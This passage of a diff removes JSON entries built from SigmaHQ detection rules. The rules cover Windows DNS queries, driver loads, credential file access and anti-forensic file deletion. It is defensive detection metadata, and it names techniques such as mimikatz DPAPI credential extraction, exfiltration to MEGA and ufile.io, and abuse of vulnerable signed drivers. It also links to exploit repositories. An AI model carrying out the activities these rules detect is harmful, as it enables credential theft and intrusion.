"dns_query", - "logsource.product": "windows" - } - }, - { - "description": "AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL", - "uuid": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", - "value": "AppInstaller Attempts From URL by DNS", - "meta": { - "refs": [ - "https://twitter.com/notwhickey/status/1333900137232523264", - "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_lobas_appinstaller.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2021/11/24", - "filename": "dns_query_win_lobas_appinstaller.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "dns_query", - "logsource.product": "windows" - } - }, - { - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "uuid": "f356a9c4-effd-4608-bbf8-408afd5cd006", - "value": "Suspicious Cobalt Strike DNS Beaconing", - "meta": { - "refs": [ - "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", - "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.004" - ], - "creation_date": "2021/11/09", - "filename": "dns_query_win_mal_cobaltstrike.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "dns_query", - "logsource.product": "windows" - } - }, - { - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "uuid": "613c03ba-0779-4a53-8a1f-47f914a4ded3", - "value": "DNS Query for MEGA.io Upload Domain", - "meta": { - "refs": [ - "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mega_nz.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.002" - ], - "creation_date": "2021/05/26", - "filename": "dns_query_win_mega_nz.yml", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", - "level": "high", - "falsepositive": [ - "Legitimate Mega upload" - ], - "logsource.category": "dns_query", - "logsource.product": "windows" - } - }, - { - "description": "Detects several different DNS-answers by one domain with IPs from internal and external networks. Normally, DNS-answer contain TTL >100. (DNS-record will saved in host cache for a while TTL).", - "uuid": "eb07e747-2552-44cd-af36-b659ae0958e4", - "value": "Possible DNS Rebinding", - "meta": { - "refs": [ - "https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_possible_dns_rebinding.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1189" - ], - "creation_date": "2019/10/25", - "filename": "dns_query_win_possible_dns_rebinding.yml", - "author": "Ilyas Ochkov, oscd.community", - "level": "medium", - "falsepositive": "No established falsepositives", - "logsource.category": "dns_query", - "logsource.product": "windows" - } - }, - { - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "uuid": "36e037c4-c228-4866-b6a3-48eb292b9955", - "value": "Regsvr32 Network Activity - DNS", - "meta": { - "refs": [ - "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", - "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml" - ], - "tags": [ - "attack.execution", - "attack.t1559.001", - "attack.defense_evasion", - "attack.t1218.010" - ], - "creation_date": "2019/10/25", - "filename": "dns_query_win_regsvr32_network_activity.yml", - "author": "Dmitriy Lifanov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "dns_query", - "logsource.product": "windows" - } - }, - { - "description": "Detects DNS queries for ip lookup services such as api.ipify.org not originating from a non browser process.", - "uuid": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", - "value": "Suspicious DNS Query for IP Lookup Service APIs", - "meta": { - "refs": [ - "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", - "https://twitter.com/neonprimetime/status/1436376497980428318", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_ipify.yml" - ], - "tags": [ - "attack.reconnaissance", - "attack.t1590" - ], - "creation_date": "2021/07/08", - "filename": "dns_query_win_susp_ipify.yml", - "author": "Brandon George (blog post), Thomas Patzke (rule)", - "level": "medium", - "falsepositive": [ - "Legitimate usage of ip lookup services such as ipify API" - ], - "logsource.category": "dns_query", - "logsource.product": "windows" - } - }, - { - "description": "Detect suspicious LDAP request from non-Windows application", - "uuid": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", - "value": "Suspicious LDAP Domain Access", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_ldap.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1482" - ], - "creation_date": "2022/08/20", - "filename": "dns_query_win_susp_ldap.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Programs that also lookup the observed domain" - ], - "logsource.category": "dns_query", - "logsource.product": "windows" - } - }, - { - "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", - "uuid": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", - "value": "Suspicious TeamViewer Domain Access", - "meta": { - "refs": [ - "https://www.teamviewer.com/en-us/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_teamviewer.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/01/30", - "filename": "dns_query_win_susp_teamviewer.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown binary names of TeamViewer", - "Other programs that also lookup the observed domain" - ], - "logsource.category": "dns_query", - "logsource.product": "windows" - } - }, - { - "description": "Detects DNS resolution of an .onion address related to Tor routing networks", - "uuid": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", - "value": "Query Tor Onion Address", - "meta": { - "refs": [ - "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_tor_onion.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090.003" - ], - "creation_date": "2022/02/20", - "filename": "dns_query_win_tor_onion.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "dns_query", - "logsource.product": "windows" - } - }, - { - "description": "Detects DNS queries for subdomains used for upload to ufile.io", - "uuid": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", - "value": "DNS Query for Ufile.io Upload Domain", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/12/13/diavol-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_ufile_io.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.002" - ], - "creation_date": "2022/06/23", - "filename": "dns_query_win_ufile_io.yml", - "author": "yatinwad and TheDFIRReport", - "level": "high", - "falsepositive": [ - "Legitimate Ufile upload" - ], - "logsource.category": "dns_query", - "logsource.product": "windows" - } - }, - { - "description": "Detects well-known credential dumping tools execution via service execution events", - "uuid": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", - "value": "Credential Dumping Tools Service Execution", - "meta": { - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_mal_creddumper.yml" - ], - "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" - ], - "creation_date": "2017/03/05", - "filename": "driver_load_mal_creddumper.yml", - "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", - "level": "critical", - "falsepositive": [ - "Legitimate Administrator using credential dumping tool for password recovery" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "uuid": "d585ab5a-6a69-49a8-96e8-4a726a54de46", - "value": "Meterpreter or Cobalt Strike Getsystem Service Installation", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" - ], - "creation_date": "2019/10/26", - "filename": "driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", - "level": "critical", - "falsepositive": [ - "Highly unlikely" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects powershell script installed as a Service", - "uuid": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", - "value": "PowerShell Scripts Run by a Services", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_powershell_script_installed_as_service.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2020/10/06", - "filename": "driver_load_powershell_script_installed_as_service.yml", - "author": "oscd.community, Natalia Shornikova", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of drivers used by Process Hacker and System Informer", - "uuid": "67add051-9ee7-4ad3-93ba-42935615ae8d", - "value": "Process Hacker and System Informer Driver Load", - "meta": { - "refs": [ - "https://processhacker.sourceforge.io/", - "https://systeminformer.sourceforge.io/", - "https://github.com/winsiderss/systeminformer", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_process_hacker.yml" - ], - "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" - ], - "creation_date": "2022/11/16", - "filename": "driver_load_process_hacker.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate user of process hacker or system informer by low level developers or system administrators" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects a driver load from a temporary directory", - "uuid": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", - "value": "Suspicious Driver Load from Temp", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_susp_temp_use.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2017/02/12", - "filename": "driver_load_susp_temp_use.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "There is a relevant set of false positives depending on applications in the environment" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", - "uuid": "7c676970-af4f-43c8-80af-ec9b49952852", - "value": "Vulnerable AVAST Anti Rootkit Driver Load", - "meta": { - "refs": [ - "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_avast_anti_rootkit_driver.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2022/07/28", - "filename": "driver_load_vuln_avast_anti_rootkit_driver.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", - "uuid": "21b23707-60d6-41bb-96e3-0f0481b0fed9", - "value": "Vulnerable Dell BIOS Update Driver Load", - "meta": { - "refs": [ - "https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_dell_driver.yml" - ], - "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" - ], - "creation_date": "2021/05/05", - "filename": "driver_load_vuln_dell_driver.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate BIOS driver updates (should be rare)" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of known vulnerable drivers by hash value", - "uuid": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", - "value": "Vulnerable Driver Load", - "meta": { - "refs": [ - "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", - "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", - "https://github.com/jbaines-r7/dellicious", - "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", - "https://github.com/namazso/physmem_drivers", - "https://github.com/stong/CVE-2020-15368", - "https://github.com/CaledoniaProject/drivers-binaries", - "https://www.unknowncheats.me/forum/anti-cheat-bypass/334557-vulnerable-driver-megathread.html", - "https://github.com/tandasat/ExploitCapcom", - "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md", - "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/DRIVER7.md", - "https://www.unknowncheats.me/forum/downloads.php?do=file&id=21780", - "https://www.rapid7.com/db/modules/exploit/windows/local/razer_zwopenprocess/", - "https://www.unknowncheats.me/forum/downloads.php?do=file&id=25444", - "https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_drivers.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2022/08/18", - "filename": "driver_load_vuln_drivers.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of known vulnerable drivers via their names only.", - "uuid": "c316eac1-f3d8-42da-ad1c-66dcec5ca787", - "value": "Vulnerable Driver Load By Name", - "meta": { - "refs": [ - "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", - "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", - "https://github.com/jbaines-r7/dellicious", - "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", - "https://github.com/namazso/physmem_drivers", - "https://github.com/stong/CVE-2020-15368", - "https://github.com/CaledoniaProject/drivers-binaries", - "https://github.com/Chigusa0w0/AsusDriversPrivEscala", - "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", - "https://eclypsium.com/2019/11/12/mother-of-all-drivers/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37969", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_drivers_names.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2022/10/03", - "filename": "driver_load_vuln_drivers_names.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Some false positives may occure if one of the vulnerable driver names mentioned above didn't change it's name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", - "If you experience a lot of FP you could comment the driver name or it's exact known legitimate location (when possible)" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", - "uuid": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", - "value": "Vulnerable GIGABYTE Driver Load", - "meta": { - "refs": [ - "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b", - "https://twitter.com/malmoeb/status/1551449425842786306", - "https://github.com/fengjixuchui/gdrv-loader", - "https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details", - "https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_gigabyte_driver.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2022/07/25", - "filename": "driver_load_vuln_gigabyte_driver.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", - "uuid": "295c9289-acee-4503-a571-8eacaef36b28", - "value": "Vulnerable HackSys Extreme Vulnerable Driver Load", - "meta": { - "refs": [ - "https://github.com/hacksysteam/HackSysExtremeVulnerableDriver", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_hevd_driver.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2022/08/18", - "filename": "driver_load_vuln_hevd_driver.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", - "uuid": "9bacc538-d1b9-4d42-862e-469eafc05a41", - "value": "Vulnerable HW Driver Load", - "meta": { - "refs": [ - "https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/", - "https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_hw_driver.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2022/07/26", - "filename": "driver_load_vuln_hw_driver.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", - "uuid": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", - "value": "Vulnerable Lenovo Driver Load", - "meta": { - "refs": [ - "https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities", - "https://github.com/alfarom256/CVE-2022-3699/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_lenovo_driver.yml" - ], - "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" - ], - "creation_date": "2022/11/10", - "filename": "driver_load_vuln_lenovo_driver.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate driver loads (old driver that didn't receive an update)" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", - "uuid": "1a42dfa6-6cb2-4df9-9b48-295be477e835", - "value": "Vulnerable WinRing0 Driver Load", - "meta": { - "refs": [ - "https://github.com/xmrig/xmrig/tree/master/bin/WinRing0", - "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_winring0_driver.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2022/07/26", - "filename": "driver_load_vuln_winring0_driver.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", - "uuid": "679085d5-f427-4484-9f58-1dc30a7c426d", - "value": "WinDivert Driver Load", - "meta": { - "refs": [ - "https://reqrypt.org/windivert-doc.html", - "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_windivert.yml" - ], - "tags": [ - "attack.collection", - "attack.defense_evasion", - "attack.t1599.001", - "attack.t1557.001" - ], - "creation_date": "2021/07/30", - "filename": "driver_load_windivert.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate WinDivert driver usage" - ], - "logsource.category": "driver_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", - "uuid": "91cb43db-302a-47e3-b3c8-7ede481e27bf", - "value": "Browser Credential Store Access", - "meta": { - "refs": [ - "https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users", - "https://github.com/lclevy/firepwd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_browser_credential_stealing.yml" - ], - "tags": [ - "attack.t1003", - "attack.credential_access" - ], - "creation_date": "2022/04/09", - "filename": "file_access_win_browser_credential_stealing.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Antivirus, Anti-Spyware, Anti-Malware Software", - "Backup software", - "Software installed on other partitions other than \"C:\\\"", - "Searching software such as \"everything.exe\" that are installed and are not located in one of the \"filter_programfile\" filter entries" - ], - "logsource.category": "file_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", - "uuid": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", - "value": "Credential Manager Access", - "meta": { - "refs": [ - "https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz", - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_credential_manager_stealing.yml" - ], - "tags": [ - "attack.t1003", - "attack.credential_access" - ], - "creation_date": "2022/10/11", - "filename": "file_access_win_credential_manager_stealing.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." - ], - "logsource.category": "file_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", - "uuid": "46612ae6-86be-4802-bc07-39b59feb1309", - "value": "Suspicious Access To Windows DPAPI Master Keys", - "meta": { - "refs": [ - "https://web.archive.org/web/20181130065817/http://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/", - "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555.004" - ], - "creation_date": "2022/10/17", - "filename": "file_access_win_dpapi_master_key_access.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n", - "uuid": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", - "value": "Suspicious Access To Windows Credential History File", - "meta": { - "refs": [ - "https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist", - "https://www.passcape.com/windows_password_recovery_dpapi_credhist", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555.004" - ], - "creation_date": "2022/10/17", - "filename": "file_access_win_susp_cred_hist_access.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_access", - "logsource.product": "windows" - } - }, - { - "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", - "uuid": "558eebe5-f2ba-4104-b339-36f7902bcc1a", - "value": "File Creation Date Changed to Another Year", - "meta": { - "refs": [ - "https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_2022_timestomping.yml" - ], - "tags": [ - "attack.t1070.006", - "attack.defense_evasion" - ], - "creation_date": "2022/08/12", - "filename": "file_change_win_2022_timestomping.yml", - "author": "frack113, Florian Roth", - "level": "high", - "falsepositive": [ - "Changes made to or by the local NTP service" - ], - "logsource.category": "file_change", - "logsource.product": "windows" - } - }, - { - "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "uuid": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", - "value": "Unusual File Modification by dns.exe", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1133" - ], - "creation_date": "2022/09/27", - "filename": "file_change_win_unusual_modification_by_dns_exe.yml", - "author": "Tim Rauch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_change", - "logsource.product": "windows" - } - }, - { - "description": "Detect DLL deletions from Spooler Service driver folder", - "uuid": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", - "value": "Windows Spooler Service Suspicious File Deletion", - "meta": { - "refs": [ - "https://github.com/hhlxf/PrintNightmare", - "https://github.com/cube0x0/CVE-2021-1675", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_cve_2021_1675_printspooler_del.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" - ], - "creation_date": "2021/07/01", - "filename": "file_delete_win_cve_2021_1675_printspooler_del.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_delete", - "logsource.product": "windows" - } - }, - { - "description": "Deletion of log files is a known anti-forensic technique", - "uuid": "b1decb61-ed83-4339-8e95-53ea51901720", - "value": "Delete Log from Application", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_appli_log.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], - "creation_date": "2022/01/16", - "filename": "file_delete_win_delete_appli_log.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_delete", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", - "uuid": "06125661-3814-4e03-bfa2-1e4411c60ac3", - "value": "Deletes Backup Files", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-6---windows---delete-backup-files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_backup_file.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ], - "creation_date": "2022/01/02", - "filename": "file_delete_win_delete_backup_file.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitime usage" - ], - "logsource.category": "file_delete", - "logsource.product": "windows" - } - }, - { - "description": "Detects the deletion of a prefetch file (AntiForensic)", - "uuid": "0a1f9d29-6465-4776-b091-7f43b26e4c89", - "value": "Prefetch File Deletion", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_prefetch.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], - "creation_date": "2021/09/29", - "filename": "file_delete_win_delete_prefetch.yml", - "author": "Cedric MAURUGEON", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_delete", - "logsource.product": "windows" - } - }, - { - "description": "Detects the deletion of the Exchange PowerShell cmdlet 